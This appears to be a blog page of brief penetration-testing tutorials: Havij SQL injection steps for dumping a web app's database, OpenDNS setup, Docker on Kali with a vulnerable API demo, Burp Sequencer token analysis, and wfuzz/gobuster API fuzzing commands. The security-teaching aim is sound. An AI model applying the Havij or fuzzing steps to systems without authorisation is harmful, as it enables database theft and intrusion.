Cyber Security | Web Development

Tool Name: Havij (Educational Purpose Only) Description: Havij is an automated SQL injection tool designed for penetration testers to identify and exploit SQL injection vulnerabilities in web applications. It streamlines the testing process, allowing security professionals to efficiently assess the security of a website's database interactions. Download URL:  https://www.darknet.org.uk/2010/09/havij-advanced-automated-sql-injection-tool/ Step 1:  Enter the application target link in the Havij tool and click analyze . Step 2: Get the application details from the Info Section. Step 3: Get the application database's from the  Tables  section. Step 4: Get the application database records with columns details. Successfully logged in the application as shown in the below screenshots.

  How to Set Up OpenDNS on a WiFi Router Step 1: Create a account using below link: Web Link :  https://signup.opendns.com/homefree/ Step 2: Configure your IP address into the OpenDNS account as following below steps > Click Add this network > Provide network name > Save it. Step 3: Choose your filtering level as per your  choices. Step 4: We are successfully implemented and prevent access to inappropriate websites, block phishing sites, and prevent virus and malware infections. 😀  

Install docker in kali Step 1: $ sudo apt-get update Step 2:$ sudo apt-get install docker-ce docker-ce-cli containerd.io Step 3:$ sudo apt-get install docker-ce docker-ce-cli containerd.io Check whether install correctly or not Step 4:$ sudo docker run hello-world Step 5: Swith to Root user in kali $ sudo su Step 6: Get github file https://github.com/rahulunair/vulnerable-api#readme $ docker run -tid -p 8081:8081 --name api mkam/vulnerable-api-demo Step 7:   You can now test your api $  curl localhost:8081 -v To list images $ docker image ls To pull back image                $ docker pull mkam/vulnerable-api-demo Run in port $ curl localhost:8081 -v Run the app $ docker run -tid -p 8081:8081 --name api mkam/vulnerable-api-demo

 Attacking Token via Sequencer Step 1: Log in to the application and retrieve the token value from the response header Step 2: Before click the start live capture > Make sure configure the settings as show in the below images. Step 3: Make sure highlight the token value. Step 4: Click "Analyze Now" to determine the strength of the token value. Step 5: Use decoding techniques for the token.

 API Enumeration - Fuzzing The following of endpoints which can be test for Fuzzing Paths: Example's of Endpoints: v2, resources, books, published, or 1993 Command - 1: wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --sc 200 'http://www.example.com/api/v1/books?show= FUZZ ' Command - 2: gobuster dir -w /usr/share/wordlists/dirb/common.txt - u http://<IP> API's Enumeration via Source code discovery Finding the endpoints from the Source Code via Browser Note: JsCode Formatter: https://beautifier.io/ Thank You :) See you in Next Topic...

Interaction with API Endpoints Manipulation      Testing Scope: https://catfact.ninja/#/Facts There are ways to validate the endpoints through: 1. Browser 2. Burp Suite 3. Postman 4. Curl Command Note: Based on your situation, we can use the tools.. Query: Returns a random fact with  MAX_LENGTH API End Point Validation: via Browser Web Browser : API End Point Validation: via  Burp Suite Positive Case: We are providing the expected input in the parameter.. Negative Case: We are trying to provide unexpected input in the parameter.. (Eg Input: -1)  - Verify whether the application properly handled error exceptions or not. API End Point Validation: via  Postman API End Point Validation: via  Curl Command Thank You :) See you in Next Topic...